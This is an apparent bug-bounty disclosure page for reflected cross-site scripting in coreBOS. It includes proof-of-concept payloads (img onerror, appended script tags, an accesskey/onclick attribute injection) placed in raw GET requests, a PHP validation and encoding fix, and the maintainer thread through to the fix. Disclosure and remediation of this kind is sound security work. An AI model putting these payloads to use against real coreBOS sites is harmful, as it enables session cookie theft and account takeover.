Cross-site Scripting (XSS) - Reflected in tsolucio/corebos


Reported on

Dec 20th 2021


coreBOS is vulnerable to Reflected Cross-Site Scripting in the advft_criteria_groups and advft_criteria parameters.


  • Outside the JSON object.
  • Inside the JSON object.
[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:Vqvl14><img src=a onerror=alert(1)>znemq","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}]


GET /index.php?module=Documents&action=Popup&html=Popup_picker&forfield=gendoctemplateburr&srcmodule=evvtgendoc&forrecord=&form=&query=true&search=true&searchtype=advance&advft_criteria=[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}><script>alert(1)</script>&advft_criteria_groups=[null,{%22groupcondition%22:%22%22}]><script>alert(2)</script> HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: democoreboscom=8f928841548129a8317753f05afccd66; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=4101476105348538


This vulnerability can be used to steal users' cookies and gain full account takeover through the victim's credentials.


GET request:

  • parameter > type"accesskey="x"onclick="alert(1)"//qa8lof2qh5k&search_text=Q&form=&forfield=&srcmodule=&forrecord=&selected_module=Accounts&__vt5rftk=sid:fb865148cbe7a0b1f0dd2c7a227b0c2c1a7d0667,1640278340&null=


Press SHIFT + ALT + X to trigger the payload.


GET request:

  • parameter > reportmodule<script>alert(1)</script>kle7w&cbreporttype=directsq
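
An added example, not part of the original report and not coreBOS code: one way to handle advft_criteria on the server is to decode it strictly as JSON (which rejects data appended outside the JSON object), allowlist the structural fields (which rejects markup inside it), and HTML-encode anything echoed back. The function names, the field patterns and the `or` condition value are assumptions inferred from the request shown above.

```php
<?php
// Added example, not coreBOS code; names and field patterns are assumptions.
const FIELDS = ['groupid', 'columnname', 'comparator', 'value', 'columncondition'];
/** Strictly decode advft_criteria and allowlist each structural field. */
function parseCriteria(string $raw): array
{
    // Trailing bytes after the JSON array ("]><script>...") raise JsonException.
    $rows = json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($rows)) {
        throw new InvalidArgumentException('criteria must be a JSON array');
    }
    $clean = [];
    foreach ($rows as $row) {
        foreach (FIELDS as $k) {
            if (!is_array($row) || !is_string($row[$k] ?? null)) {
                throw new InvalidArgumentException("missing or non-string field: $k");
            }
        }
        // Assumed shape: five colon-separated identifier tokens, as in the report.
        $ok = ctype_digit($row['groupid'])
            && preg_match('/\A[A-Za-z0-9_]+(?::[A-Za-z0-9_]+){4}\z/', $row['columnname']) === 1
            && preg_match('/\A[a-z]{1,3}\z/', $row['comparator']) === 1
            && in_array($row['columncondition'], ['', 'and', 'or'], true);
        if (!$ok) {
            throw new InvalidArgumentException('criterion failed allowlist');
        }
        // Drop unknown keys; 'value' stays free text, so encode it when echoed.
        $clean[] = array_intersect_key($row, array_flip(FIELDS));
    }
    return $clean;
}

// Encode for HTML text or a quoted attribute; ENT_QUOTES covers both quote characters.
function h(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
// Constructed inputs mirroring the payload positions described in the report.
$row = '{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V%s","comparator":"e","value":"1","columncondition":"and"}';
$inputs = [
    'clean'   => '[' . sprintf($row, '') . ']',
    'inside'  => '[' . sprintf($row, '><img src=a onerror=alert(1)>') . ']',
    'outside' => '[' . sprintf($row, '') . ']><script>alert(1)</script>',
];
foreach ($inputs as $label => $raw) {
    try {
        $verdict = 'accepted ' . count(parseCriteria($raw)) . ' row(s)';
    } catch (JsonException | InvalidArgumentException $e) {
        $verdict = 'rejected: ' . get_class($e);
    }
    echo "$label => $verdict\n";
}
echo '<input value="' . h('type"accesskey="x"onclick="alert(1)"//') . "\">\n"; // attribute context
```

Validation narrows what reaches the page, but the encoding step is what stops reflection: free-text fields such as `value` cannot be allowlisted and must pass through `h()` wherever they are written into HTML.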


We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
Muhammad Adel submitted a
a year ago
Muhammad Adel modified the report
a year ago
Joe Bordes
a year ago

Hi @itsfading

Thank you so much for your effort. I really appreciate it. In coreBOS we do not use mysqli_real_escape_string, we use pquery instead:

$adb->pquery(SQL, array(of, parameters));

Can you change those?

Muhammad Adel
a year ago


Hi Joe, I think you are referring to the SQL Injection report and it is not related to something here, right? I am not quite aware of the syntax of pquery and cannot find documentation for it. Also, it seems you are using it correctly in some places but the vulnerability is still working; that's why I used mysqli_real_escape_string whenever you take the input from the user.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a year ago
Muhammad Adel modified the report
a year ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. a year ago
Joe Bordes validated this vulnerability a year ago
Muhammad Adel has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed in 8.0 with commit 8c1556 a year ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
NewReport0.php#L109-L131 has been validated
Save.php#L112-L116 has been validated
RecycleBinUtils.php#L41-L54 has been validated
a year ago

Hi, this issue is not fixed on the demo website.
